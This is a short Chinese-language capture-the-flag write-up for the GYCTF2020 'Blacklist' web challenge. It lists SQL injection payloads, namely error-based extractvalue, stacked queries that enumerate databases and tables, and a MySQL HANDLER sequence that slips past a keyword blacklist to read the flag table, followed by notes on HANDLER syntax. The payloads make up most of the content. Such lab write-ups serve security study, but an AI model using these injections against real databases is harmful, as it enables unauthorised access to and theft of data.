[GYCTF2020]Blacklist

原理

1. 堆叠查询
2. 查询表名和表结构的方法
3. handler的使用

payload:

1. 1' and extractvalue(1,concat(0x7e,database()))--+
2. 1';show databases;--+
3. 1';show tables;--+
4. desc 'FlagHere';--+
5. 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close--+
   注意这是在url地址栏请求，注释符用--空格
   参考文章：https://blog.csdn.net/weixin_44309300/article/details/129968265
   打开句柄
   mysql> handler table_name open;
   read first查看数据
   mysql> handler table_name read first;
   read next读取下一条数据
   mysql> handler table_name read next;
   关闭句柄
   mysql> handler table_name close;

本栏目推荐文章
• mrctf2020_easyoverflow
• CVE-2020-11800
• 【LeetCode 1635. Hopper 公司查询 I】with recursive生成2020年每月的最后一天
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• [ACTF2020 新生赛]Exec 1
• wustctf2020_getshell_2
• P6646 [CCO2020] Shopping Plans
• bjdctf_2020_router
• 题解 P7165 [COCI2020-2021#1] Papričice
• mrctf2020_shellcode

Blacklist GYCTF 2020blacklist gyctf 2020 flaskapp gyctf 2020 web ezsqli gyctf 2020 web flaskapp buuctf gyctf 2020 blacklist gyctf 2020 2020.11 2020.03 2020.2